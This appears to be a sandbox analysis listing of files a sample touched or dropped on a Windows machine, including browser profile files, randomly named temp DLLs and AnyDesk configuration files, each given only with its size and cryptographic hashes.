9960ead8f63616b31ad5e44b72d8d21bf1a03c8aba9a48e1f5f15f958f2999d9acca08c52983d386b3f4b69a9669564cd3a2b910f0cab9f600445931951b5141

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
e38747511a85430962f4edf23bfeb2a9

SHA1
c5e79d60a79251d1db7852e0f6b641bf6f79a3b8

SHA256
65c2c13e1cd912fa63c070d5e3ed40b0721db06b707923a73893d5bbad535b31

SHA512
dd94f1acd3b76c17d166079d7a02f3b634fb517c8fc68e129653ad2e037d1ed09899c6436303d52da4fe8d5d0ef42baf09307e37f5f1036f6cbe333c095faf84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
24b1b7a8931b45fd091e2f5f4b825baa

SHA1
830f9a4148ba6d2e4ee551df313de0102a7a8c71

SHA256
423b5f55c6e5e15ba24c22e2e1d519ef623dadb8425894075968016052aafa85

SHA512
1b4ea5fb1a49371aeed18491d0b1cae80cddaa905852d57fd0f14fbc298d20125f6929c0d293aea577a6db3972e2efc2b28ac1773606083231263f7765571cd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
390a2004e922fae1f48cfb623a955882

SHA1
230380b8bb1e0a254a2a7094f394cfd8306ea4bb

SHA256
dc391ecb2f55e900a3590cd5933f263ddc56010c39685cafbf2d39eb69ca8721

SHA512
bc3da3aa8a7cb770dfa8bd627cb28fb625002e8cd2eac51de1a7937b4a83062341d22c19470ba2da3635782f2abeb3164aac1700f25ac85ffb8fefecc33e186d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
938080171b34035679dd197640daee83

SHA1
9b45065bd20ae92343bd5f210dbaf2a1d38f59b7

SHA256
d46992dfdc7d0c5a618bfb86d945805384dbc8bce4ce1e5e5829ebb8ba662513

SHA512
09133541f6122135b5d0de448d2d6ace3e75641202e549c9a9da40758918b624b64978c16f53c17cc25ce88d26b8af323954fe00a7beaacb40e0592e6f272237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
442B

MD5
2448fce1845b2291181a6e61e7ab688a

SHA1
b59e0025f6fb8e24efda281ca6f4aada42769591

SHA256
dca65eb08f25b6e44d8006e455ea207ab220ef00bc827fa420620b5ee8e206a2

SHA512
791c4e035c75f7a5180477ee788fb983d9856b3ac8490a7d52e8a86a019768f6489ddd9d2de75309bdb622fbc26b570640601496577db1919a56363fed70c093

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
890c5046182a77d714ee0dd53520b68f

SHA1
06b1f42ed90b96b0350cbbfa7ff39ecaf21be8be

SHA256
b00a71685a10e9cc87168d8307b00e0b93f6fa0a58313bda8f981e35e50c2186

SHA512
b8d54aff5b9010b91211f9269bb007c2e2ea2aedbd336c4732277412fd3a9bbf52fe34a2d1c068418d433b6227fc84333bf840dec685431fefb67fd428294872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b56aef5b1c19eb17fa8d3befd543cdfd

SHA1
1d77f4491c7df8a5f9d8d7af8a73393c1fcc28a8

SHA256
7a2db651be136a07fc905ef7115d1110f77abc253094b14b4184ead6a4ef21e0

SHA512
8d9ea34bedd39d2e61b4408bba4419de3ef86ce80950e330b8aed7512b1ed3a02500605c1725c746e14d1d9dafd4658dda57ec8a9805309c751251f8b05eb7cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
36f5f25611c1b6d7a72cd77057c60ca7

SHA1
bdd74c0580a852ab6ed72279391f70181bbcd9fa

SHA256
a8da7e3fdee71cd8f1528236e08099131d019be3bfa1b3bda645abe3229dceca

SHA512
66a8d70bc78c4824999709f01feb6a312fe4e568c280edffd223ab04a1d952f776362b5f9a8865d3eb5d96c8dba14426a437efe849bd6fb8a60086aff26b1fd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8045093899544b4dae7bb85083fc43f6

SHA1
a07641aae7b9b849658f422a46290e74592dcccd

SHA256
17b4738f23537b9cf5c7042ff82dd9bce56565f9198f4013ce11a130f8d744b7

SHA512
8801e1c1077b452086484c2715f153c271d9df817dccc81734291e01c5997adb41d78c303cd1929c6a87579455c3840b3fab787fc3516900c9090543415c86b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9b0a74c040af0c6e14e5928d4db0f235

SHA1
bcf7d19c132672e8d3c617915e3072c85d302b61

SHA256
d2297185e03c60e759136cb1337fa232cd8ef0141d9139e1e161cdb87a9c84bc

SHA512
25e9e82f988325438ad95eabca1e5e3b7b41c50a424a3eb6e81c2c750695b37d7248cfdb420c10dce9232a63134010fd9a1aeb42cbf465ba1d11c09284afb62f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3745d586dcc275391b9fd46caeefe347

SHA1
77f7598877cd90b3cf819fcabf6351295c6f9cbe

SHA256
39c06287d96e79402953ed3e13f3432d8a76e71daddb25f7e75821511a84da8d

SHA512
da887529872a6408a8176e53f7a359a67ee2d625a2744f978d3ec44ffb79cba563c15424fc43b7e8687e6e2b770a50d3594e9f145be5df87adf009ee08269560

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3f92882c0454e2797253fc0a9bec0e71

SHA1
c90dc5adcc80796588e1cd57b41c58560e8e3122

SHA256
213905b8df20e7eaae472db9439d6cb1fe7413267285129972ec157903946e05

SHA512
8f5e667bef001d3dc280d580b31cbdffbb969611ba9aa0083eafd82c7f28d37a75b838957ca11e32b74016c8f9dc81a0a763d880374adbbc8b0ecaca9e23ecc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c24bfacfdfa52db84b11b0b4db893570

SHA1
c5aa02feb7fb344c1252cdca60c35d9e29388fb2

SHA256
500e1cbc205a53fef5ec51bee74c7f9ea10c7a1ce84f3e9a010db4cf7f0aaac2

SHA512
fc2c8a0b0b77489a8d15f8308738b8699b7736d0e11edd568df670224136eeb68a6264b61c6855078645366aa0a74ec07389be94b7301c3e67727398d109d520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d69c4064d34d405b7e9b7312bf415f0f

SHA1
d3186b6927633a57dbd1f83815badda5526ed697

SHA256
0422ca3beab847abae97c18ade7ffa313de86917be4b0cebb64849da01369bb9

SHA512
9cbad391bd66809cb1a5d526c87a4596a54de404b27fcc64bc9a17562e07c3eb7acd776131f3b199b6f1f3ea879f1b9a668e63183e512f2ecf48aef041e2d066

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
043852d0ccaa412beddd92990cc3898c

SHA1
d86c16af6af8a68270c1bd489cd5711552edd1f1

SHA256
c0259857895a0a44a681967e12642fcb8ba67e76cc04f5037bf25c399ea0d2f0

SHA512
619845c78c23ad73942c9346c9a11b2ef6933844d73a814c6ed8a8838d9f49664850ab912b38e038507a7b0c201090fd631cf5693d741151a583338884c40f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bed102ae215386ebb30035e909b2092a

SHA1
a27ed05018a23d16d2d1a821055874ed02c7e78c

SHA256
87b920b4bd2380509c4a5342b73917e601d0f0e400f5afeda116c3aff8ccc8ad

SHA512
c715122b39ce65e591ab8d571f492c8444d648a2b7542fbfec1d553b865c11ec2e4ba01f71ff1b4daca2ead39e07a00cd8729a9193a4ca6a86f1769479b3903e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0363a99ad3fb742f85e47ed69ec63ff8

SHA1
57702307934dd4805cc795ae39f428d04c5fd07c

SHA256
c010ab0112d438bec725a270e4cbbf146931bd4453ce3db44ebcee391c852fbe

SHA512
d3141c387da58ead101a276c7cd7cf43ec990477be0a7ff0e58f3dc1e4420ad7dddbb1a5a312630e41f7c429f27d7563e9804f0233b99269901d35cace850be9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
00299e1fc6cb0759819fca213cf3cbdc

SHA1
894f4d4af3f2db716dff55ac458598863a51a922

SHA256
4cd8de7fd27824e18bf9bba7525532362b1910b63085a8cae56440f49d900b00

SHA512
d7713a29bb36d05b18277976797de8ae524376d4d857941ccc60665676b2023854e70fa7d5f35f4840870d051d54747a46e1bd4556f1e8fe90fb9e4a184f8e17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
efa86ffa83e9ca6ef89c94e285d0e611

SHA1
ba9d95c8a61eb186338b26ac0af78d59148cd473

SHA256
0417fde59432aebcbc544832e28605057b7bbfb6343bb4251aba31867fb8a2d3

SHA512
1b46614d836c48b793153c8f69d536e6a22535b2cd37292240845f385347ef435252c06b43c6429c3d73f7bcf6c790f8dbddbf6fe97f0857be25967d585e7f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6d6bae6f15bfac35aa0e0d3a589f00c8

SHA1
0dcfd0b82109b0961a4b8225d2cf01e3738ab1c6

SHA256
119e80cb70f0bef727b258f2e89c7bbda45ed6a199956825ccff4814dbf0ccd8

SHA512
648a526604ac1e41ef57f7c584d66d1fd4dbfef788c94aab72c9795f3df976d7d5b93952decb1276fa0673bcc8692b932dc153d7c17fee8928666894824080cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
acdff894b7181d17236efa7fa8abd78d

SHA1
c468bef62e3678687c2395b955339a0e8551f20a

SHA256
95f49ae24847e9e953cfd2eca06f80c6a4bb46c11aec039151c4fe642e361fce

SHA512
0c393f6ae898da5b6652b3f3bb9fe229e7f130fc7e0767ebf18b95c340b09f2d564a4f5eae084697a1ef0907546d14b6b58b06006a907887450bf3ce65616cfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13379460516748007

Filesize
8KB

MD5
acf57b94f6def203288ff06a087d6623

SHA1
53e771768c075911a90e334e12a1e1f4254cb83e

SHA256
15406f918b4dba4a924f9ef5e4f89dcf1b46adc81717421eeb2ed3636d5d687b

SHA512
59acfdcba72d4f29d17262ee9b3a0684b97167f44f08d64dc3505e59fab409b4642f1ab0236c33416e7e4da3ab4fc3de9c1c2877cc7084237402306fbcb4ff20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
423730bd0755a8ce65d91ddedb853499

SHA1
d4a6daa5faf955f59a4f7969625f816ab3f5de57

SHA256
a32f7e56b76c06fbbff55596555fcf2baa387b00c91bf739da5684395305b56d

SHA512
c018b7dc6fb1bc7719fe4a864b0364e6271362d7596a796736c5deffa140f6b2c622d7059698c228654afd77a21dbf60cf29052e9a7e2c062418b3889e431fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
5802fd8679c402a5f627eaf60a6fd4ea

SHA1
26363b19c00f1ea83cbb2c3c2f368353f6ee3c5b

SHA256
f319ea61eb1e935bbc1e49f425b9560b3b7efeb11785186bd07c549d3136db78

SHA512
180bccf40807c4cb5ffda0adf228e8f09cb478d25e804bfa3bf308dc828b7135bacf8699ac8007edfc0306f78a9276433cb29912feda3a5c471bad1c36353ab2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
41e043171fb96add2e1bcc1467bbb84f

SHA1
9c8c7a83d1ecab409718c856500b31903f03d110

SHA256
258f32b053d41ead69d2942ffeadb7c015d5434da6c8968f572c52b38a797e03

SHA512
b3fd3bd1bdf16b36e4f1d37b2d2c1d58da9a51d738db9af50b863e9a9d2a0aa2fcb564807a48e7c3c2e6842b062a95c270829e261f0fa0df1a99b4f8cf643381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
1a9801111f6fe59e75c802ba04c8d4f1

SHA1
bfa61d72b38944551b4593d52dcaff7629b289ba

SHA256
858646826ab80175a57568301ccf190579bc672606c7eab732b0dc04d9ffafe8

SHA512
055a2244920d8ec80f80e01d779630b0daff55d94afb203deef72cf99b64cb0cd824c2259f5154bbf66b47092b42d4996077827c527b79d5f285a09fb74ec041

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
127cd58533064d26c1d812b4fddcddb2

SHA1
6f1cda0ad59a43ac9af1f5f6a77405e1e74319cd

SHA256
97eedd23fb57ce4b43546b784f2c9e364da0ebf2c0b8dc02e14d2eb39588839e

SHA512
7fbe6b14cd28a7e16e514ea4a6aef93827d268ae957fce7545c022c39a200fe27d0e3450bea4a5af07a674349e116f339f4b005ea19e9a4bc4ccdd01855d9d36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
eb955b867e25730e3896605c47978a31

SHA1
1f87ba6ea5cd529fdcd672613150f6eb258f09e6

SHA256
4f3f421ad41047cb29b8f5f34defb5964fd1f7be0f324fe6699bfb19793fe68f

SHA512
339af4af26f57c80ed456f2b2c0efa0e1994c9ffd6f4297975ea2d7a1014404db8e15478245cf184355559d572140badbe94421f2e874d8c4673949d676b36dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
899e6faf488132d8b41b7a92076f70cb

SHA1
d81480883d8e629d14c3e61c67a505e4ffe104c9

SHA256
321390dd5b552872d4470d0b61254b5c00550d280605a7d6a797e8e401282eee

SHA512
813f5a0863ecb81018e7b7859e30a9412fd2033cbec0fe96b3a5964884a59be0527602458358d330a1efdf668f6adb4a9498999d685b1229ae86f078c0286625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
951b07bcf67fa75a1ea4cb7ce4553cd6

SHA1
becf5e4a03b64d68832acafa57ce32dc961c8fc2

SHA256
4b08670bffa29efd2b8ac340e0bbb1d884c12fb510324cd5c358d091155fd5d0

SHA512
0a8d591c04d9de623fdc33b65fc67963189a69de37046eb078a65cbfa0a3548830d297cf6005c36c32290d4202929403c6e41f285b2269dccba818875af2e85f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
589c49f8a8e18ec6998a7a30b4958ebc

SHA1
cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e

SHA256
26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8

SHA512
e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
d378eecdc88c7bbb4f406c02d665655a

SHA1
78bfa4d527d40c6925e777ad20dff5bc47f84bd2

SHA256
d4b2e83ae9f4372c08c31cbd3d6daa818429b9ffb62ffa400be87fe6d7394587

SHA512
048e4d7c37268120ac590ab34bc2005b2dc398094566b8900de1f433b532ed8e667309accaf901df4ebef83b8f8958d16d366a33c5540e6382ccddc54b489b7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
568f2f58d6208b4a0196e3a526932c87

SHA1
b8290efd218918ba1fe0807e88e9d10c1311a20f

SHA256
dcb74ec84bee829b6bd7402d77de2da96c734fb8fb46c77d4d93fa27e86ec549

SHA512
90e9efc179bc84f3c60773f151b0cad128fadfdaaac70142dffe4569c637483c3e8ed3254c03657942caccda855ba2db0322bd43dd65a60528bf1facfe403448

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
ee3939fdc1607ebca4e3ffcbacd1f1fc

SHA1
8a11344e82aedcf46140efafe094811c2face528

SHA256
898bacc70fab421bbefb5fbb6c0f75cae5f84380b5d2c49f3c1b018c0d7eded1

SHA512
3e5774c5d5b548264a07c9a93e46644507e04ca3debad46ed964a62e1fc614fb7cc65bddda755e3ecf3476e76ac9d628d843d36a8eb030712af2fc7bc089e223

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
125a1cc60f99c94510b3542c843c5ef8

SHA1
c7e494ef70b2901340e29a51dafd2345f73ea767

SHA256
1c08716611cb8cb59d14821f376b54054b6c04fd3ee3b1c01e92757d9cf785ee

SHA512
636c35ef5f7caeede87d69ece21288316864bcb1dccefb7f8b2cc04928276118288b17738827bd03756cf16f556068f3eb34e2e8c2b33ef09b21331dcda13e89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
922d28a0bdf3c62eba0b5bb6458a98aa

SHA1
d35802fdc70427616b6cafde8228d8dc18d54c5a

SHA256
0c52cc20a771c2595358ffcbd2b32aa41c64b54ea985ee482557e413e49b68f5

SHA512
45bb16a15b90532f89ea7177acc27c31dec16081e3dd896d115b5881c211d00834e77813e569ef3a03ba11bc45bf4f2c696ce9ece9ca370d2a9e2e6ec49497e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5e5dc20b8f83c683c1c734fabcc529db

SHA1
97e0b2df7581fb55357ef66d2768fc7847d5084e

SHA256
931d9e827297e228b968f31955fa0708db97d9230d17a31f9ad18c86c31065aa

SHA512
9924d4e269247ad8a03bf4dc307638b081fd30f597e03e10fc2684f62ba59982652fd61af4b63e4634192cd006d7bbe5d87eae5eb8acfaaeebc498773f3dc829

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b2d9189652fada8c893e3f5bc8eb6540

SHA1
3e12619e41060789d176c2da100ccb6956040d6b

SHA256
c912a2e5531e34cbec9beda41fb2b277b7dd417445010de95c0a1dea83d10f36

SHA512
92838fd3adafb05f871bfc76f276d56fd377b60fa8a3bbaaaa4caf6c7127eae948b4af3f95732d9b1b3f5d00b6e2a549dbe0f2580aafe58a731613454a506876

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
19916f913ad95097787f3857a8605e12

SHA1
8c9534c95b088ca471142356b511d33a29d2a900

SHA256
1df2f3fc5c7dc5a69044b24138f672783ce5d2a33400649951bc41fccfe2048c

SHA512
c83b4eabde98916403bacf22058f08c54ca866d4c8a05247a0c4679cd14a39916fbb6a74d87dda3edab77b603194c102b0a1653b194ff71c04c793c53778eb94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6d87e8d33c3c05d9b82dd38aa4365b81

SHA1
5bcc93eeea68b6386ca49b2eab1bb18a9cfbbfd9

SHA256
103ce2613d7a815253167384e619e14b842e2394377eed9fc53b7143b056323e

SHA512
52ecb6abc25da6fbe6c31a94f5000a959cc537e459225fa4a2a8645738df50fa65cd7238c74e52f3e077ec1e1869d01e82042386c8c2863051992080f5b70ac7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f1abcecb20b1e4e487d085b1618ebee5

SHA1
1b11995ce00855bb757a20596d0f47ac05f397aa

SHA256
fb6168bbd92d0d9c272cd40573dde98d42f32bccf29b906034ff7e53b1352b5c

SHA512
64b0d2a1fdeb80992e5464848c03a0c4d6c2201a4efdcc445f28030acd75d2e2e81e6741711efabaaf0d326c71d9f6f5d75c60424a144e2cbef3e47ef979933e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5cc86207fecc01b856de7c5cd576efc9

SHA1
b3a5836ff4adc55e4bc622bb264e5fbf721bae09

SHA256
e3aee3009eb0efd1d276231cf45020fbdd52e1afe4c38ed48aa97defe1f81da0

SHA512
7a4afbb1a455298efa55afccc9ed36aa1ce75ed9306eed99cef856b29a57fb4ace533ed422a7b95dbe72f572c2e822b79f4a21c4c3b3834bd5686f96a846c26c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\activity-stream.discovery_stream.json.tmp

Filesize
18KB

MD5
f53b70ca4f605df79c8b0afecb7d340c

SHA1
1e51e31376517afa85368e2f6b2660539f00fe44

SHA256
61c2e9c3bc25cff7d158050fb1415b41cbd80f01ebd6d0105b0de2e31b238564

SHA512
f76ecce5810011fed53b2c9c1731f947d8409bd657b2bae8afa6f2770197b73d383fb0f93dad407d136a8233e2c8f8c014bf6181eb558fb9741996d72ad09d69

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\cache2\entries\6653BC7BE242C21AA1988A4A42D1DEDA18231C31

Filesize
13KB

MD5
c94f49c2edd956f845f34627eabc9101

SHA1
8c73fb6a0e7044221ee507829092240889c56b0f

SHA256
35c1805acc51c9ff8cfb9f24f714505c79f676202152656c8b87046ae335ff0f

SHA512
cf73f61ee7f6f0f53927a9a64c904419938b9b2300a46c7760e5f8b8c27f3dc6395a23f7289efdad16dfee768558b2ff13d3abac7fdc44f21f82fdaeea2e1421

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll

Filesize
112KB

MD5
2f1a50031dcf5c87d92e8b2491fdcea6

SHA1
71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f

SHA256
47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed

SHA512
1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\aPjMR\aPjMR.dll

Filesize
84KB

MD5
0b0e63957367e620b8697c5341af35b9

SHA1
69361c2762b2d1cada80667cd55bc5082e60af86

SHA256
bd9cdcfaa0edecdb89a204965d20f4a896c6650d4840e28736d9bd832390e1c5

SHA512
07d0e52c863f52ecb3d12fab9e71c7a18d54cbedb47250bee7e4297ff72ed793c23a2735c48090c261fe4633d53d03e305c1338dfc881bb86874d1633ff6ecee

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcapi.dll

Filesize
385KB

MD5
1ce7d5a1566c8c449d0f6772a8c27900

SHA1
60854185f6338e1bfc7497fd41aa44c5c00d8f85

SHA256
73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf

SHA512
7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
8KB

MD5
a6288f7d08fcfe897fa658f313110723

SHA1
8339df5f90c03e8a630772562c6891f430e5a1e4

SHA256
aead7b23d71eed67005f8b8268eae5c5f798e5cb1fc579da335d3c48e2075af2

SHA512
30bb87ac882c4a7bcf9c6e11b567306faf95c6ef2b7c9b712a17a604b78e78176b1fb5bcc88c6a2bfa0fe1618d91897a7f9cf33cb46d0094e84a2bd1d485b8d7

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
43KB

MD5
fd5214d709d89de2981202694273e134

SHA1
c46dc5a47a500f172f83e40f42c954f1e296a035

SHA256
57883147bd3d2218cc31a0e7eca17e2ab0ea1c649e13230fbd32bfd64484760d

SHA512
b7c97d77bb12bdb9300c9caa79be2c3a7946cc8d109237206985c7bc397fcd3fdd1e683d1f1fd5e4db3adf95e22d869c8232f4106b12dddc66c96af99bf47c58

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

Filesize
2KB

MD5
ca944bf55264e26bc7849a4de1ec0b91

SHA1
ddba748debd4b2bc2eab3de263f674b00f2a9f35

SHA256
f3743b943300a6275e76f29e48d9fee8c1a0c57a2da4441701744da8098aee27

SHA512
b3ae03e9c98bc6f315674e5b9cf077d25af18e0c1d98fdd17fccfde6a2f56d313a8825b6a59eb91f42bb0efb81f0623fbcbe98919cdf1aa54fcc5bd3c3f8ee5f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

Filesize
2KB

MD5
edea82785456d03c1f711ac147eee611

SHA1
58b77243f60cf7f820e92268540738b4205c1409

SHA256
f159a748fb1bbf438e00c9611a34360393f72c631de3a6cb924b8dd0dc4c05e2

SHA512
286381f4b85eb157c0f0f1e08f427310c93498a90f9f36c7f065c56e470224d86889ddac4d8fe3b21cb79525608ddad22c6c859291daea5f3fcf5dddceb5e462

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
766B

MD5
e82931f7065e0ada2b2f39dafe73424d

SHA1
dbb04dd4a34bdde90755d40d71b77f93f15367f1

SHA256
c8d1a98ab13a363a15465b7d88750d91ad608669d828528a61abbb03450b53bc

SHA512
5645dd47f3abc01307fc7fd666145c0e82354b842a6b0b48fb27464f0ec2dc00dc3a62fa7413e580eb1697452f5e1b3a63e4de5e88f9dc126607b341711dad60

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
823B

MD5
5075427b272ca423df59b6892f6f05ca

SHA1
cebae7bff627175d81b406678d41a7cd0b6429b1

SHA256
3e1651f7c630fff1723472a990ce98061435080d3aff30a5267baf7e253c7c28

